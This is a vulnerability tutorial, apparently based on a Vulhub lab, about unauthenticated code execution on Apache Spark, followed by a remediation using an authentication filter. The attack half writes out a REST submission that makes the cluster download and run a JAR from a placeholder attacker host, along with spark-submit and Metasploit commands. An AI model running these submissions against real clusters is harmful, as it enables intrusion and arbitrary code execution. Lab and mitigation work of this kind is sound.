Unauthorized Access Vulnerability in Spark
Vulnerability Description
Apache Spark is a cluster computing system that lets users submit applications to a management node (Master), which distributes them across the cluster for execution. If the Master does not have access control enabled, an unauthorized attacker can submit an application containing malicious code; the Master will distribute it to the Slave (worker) nodes for execution, resulting in arbitrary code execution and threatening the security of the entire Spark cluster.
Environment Setup
git clone https://github.com/vulhub/vulhub.git
cd vulhub/spark/unacc/
docker-compose up -d
Vulnerability Detection
After the environment is started, you can access the Master's management page at http://your-ip:8080 and the Slave's management page at http://your-ip:8081.


The vulnerability allows an unauthorized user to submit an application, which may contain malicious code, to the management node.
There are two ways to submit it:
Using the REST API
The payload is an HTTP POST to the REST submission endpoint on port 6066.

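A sketch of the request, modeled on the public Vulhub PoC; your-ip is the target, while attacker-host and the Exploit class name are placeholders for a JAR you host yourself:

POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Content-Type: application/json

{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.1.1",
  "appArgs": ["id"],
  "appResource": "http://attacker-host/exploit.jar",
  "environmentVariables": {"SPARK_ENV_LOADED": "1"},
  "mainClass": "Exploit",
  "sparkProperties": {
    "spark.jars": "http://attacker-host/exploit.jar",
    "spark.driver.supervise": "false",
    "spark.app.name": "Exploit",
    "spark.eventLog.enabled": "true",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://your-ip:6066"
  }
}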
Here, spark.jars is the compiled application JAR, mainClass is the class to run, and appArgs are the arguments passed to the application.
At this point, visiting http://your-ip:8081 shows that exploit.jar has been loaded.

The response contains a submissionId (driver-20220516074753-0000); then visit http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout to view the execution result:
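The same result can be fetched from the command line, for example with the submissionId above:

curl "http://your-ip:8081/logPage/?driverId=driver-20220516074753-0000&logType=stdout"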

Using the submission gateway (integrated into port 7077)
If port 6066 is not accessible or has been restricted, we can use the master's main port 7077 to submit the application.
The method is to use the bin/spark-submit script that ships with Apache Spark.
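A sketch of the submission command, again with a placeholder JAR URL and the same example class name as above:

bin/spark-submit \
  --master spark://your-ip:7077 \
  --deploy-mode cluster \
  --class Exploit \
  http://attacker-host/exploit.jar \
  id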
If the master parameter you specify points to a REST server, this script will first try to submit the application using the REST API; if it finds that the endpoint is not a REST server, it falls back to the submission gateway to submit the application.
The way to view the results is the same as before.
MSF
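Metasploit also ships a module for this issue; from memory it is exploit/linux/http/spark_unauth_rce, which targets the REST API on port 6066 (verify the exact name and options with search spark in msfconsole). A rough session sketch, with placeholder addresses:

use exploit/linux/http/spark_unauth_rce
set RHOSTS your-ip
set RPORT 6066
set SRVHOST attacker-host
set LHOST attacker-host
run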
Solution
Create a JAR Package Containing an Authentication Filter
Compile the source code using Maven in IntelliJ IDEA.
Add Maven Dependency
After creating a Maven project, add the following dependency to pom.xml:
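The original dependency listing is not preserved here; at minimum the filter needs the Servlet API, since it implements javax.servlet.Filter. A sketch (the version shown is an example):

<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>javax.servlet-api</artifactId>
    <version>3.1.0</version>
    <scope>provided</scope>
</dependency>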
Create a package named com.demo.

This is a Java class, SparkAuthFilter, that implements the Filter interface and provides HTTP Basic authentication for Spark services; a reconstruction of the class appears after the list below.
The class contains the following fields:
LOG: A Logger for logging purposes.
username: A string to store the username for authentication.
password: A string to store the password for authentication.
realm: A string to store the realm name, which is set to "Protected".
It overrides the following methods:
init: initializes the filter by retrieving the username and password from the filter configuration.
doFilter: this method performs the authentication by checking the Authorization header in the HTTP request. If it exists, the header is decoded and the username and password are retrieved. The retrieved values are then compared with the pre-defined username and password. If they match, the request is allowed to proceed through the filter chain. Otherwise, an error 401 "Unauthorized" is returned.
destroy: does nothing.
It also contains two helper methods:
unauthorized: sets the WWW-Authenticate header in the response with the realm name and returns error 401 with a custom message.
main: does nothing.
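Below is a minimal reconstruction of the class based on this description; it is a sketch, not the original source. The init-parameter names username and password are assumptions that must match the filter parameters configured later in spark-defaults.conf, and SLF4J (which Spark ships) is assumed for the logger.

package com.demo;

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class SparkAuthFilter implements Filter {

    private static final Logger LOG = LoggerFactory.getLogger(SparkAuthFilter.class);

    private String username = "";
    private String password = "";
    private final String realm = "Protected";

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        // Read the expected credentials from the filter configuration.
        // The parameter names "username" and "password" are assumptions
        // and must match the entries set in spark-defaults.conf.
        username = filterConfig.getInitParameter("username");
        password = filterConfig.getInitParameter("password");
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response,
                         FilterChain chain) throws IOException, ServletException {
        HttpServletRequest httpRequest = (HttpServletRequest) request;
        HttpServletResponse httpResponse = (HttpServletResponse) response;

        String authHeader = httpRequest.getHeader("Authorization");
        if (authHeader != null && authHeader.startsWith("Basic ")) {
            // Decode "Basic base64(user:pass)" and compare with the
            // pre-defined username and password.
            String encoded = authHeader.substring("Basic ".length());
            String decoded = new String(Base64.getDecoder().decode(encoded),
                                        StandardCharsets.UTF_8);
            int sep = decoded.indexOf(':');
            if (sep > 0) {
                String user = decoded.substring(0, sep);
                String pass = decoded.substring(sep + 1);
                if (user.equals(username) && pass.equals(password)) {
                    // Credentials match: let the request proceed.
                    chain.doFilter(request, response);
                    return;
                }
            }
            LOG.warn("Authentication failed for request from {}",
                     httpRequest.getRemoteAddr());
        }
        unauthorized(httpResponse);
    }

    @Override
    public void destroy() {
        // Nothing to clean up.
    }

    private void unauthorized(HttpServletResponse response) throws IOException {
        // Challenge the client with the realm name and return 401.
        response.setHeader("WWW-Authenticate", "Basic realm=\"" + realm + "\"");
        response.sendError(HttpServletResponse.SC_UNAUTHORIZED, "Unauthorized");
    }

    public static void main(String[] args) {
        // Intentionally empty.
    }
}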
Compile the project using Maven, and the compiled jar package can be found in the target directory.
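With a standard Maven setup this is:

mvn clean package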

Apply the Configuration
Upload the jar package to the jars directory of Spark. In the configuration file spark-defaults.conf, add the following configuration:
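A sketch of the entries, using Spark's documented filter mechanism (spark.ui.filters plus per-filter param entries); the parameter names must match those read in the filter's init method, and the credential values are examples:

spark.ui.filters com.demo.SparkAuthFilter
spark.com.demo.SparkAuthFilter.param.username admin
spark.com.demo.SparkAuthFilter.param.password changeme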
Restart the Spark cluster.
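For a standalone cluster this can be done with the scripts in Spark's sbin directory, for example:

sbin/stop-all.sh
sbin/start-all.sh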
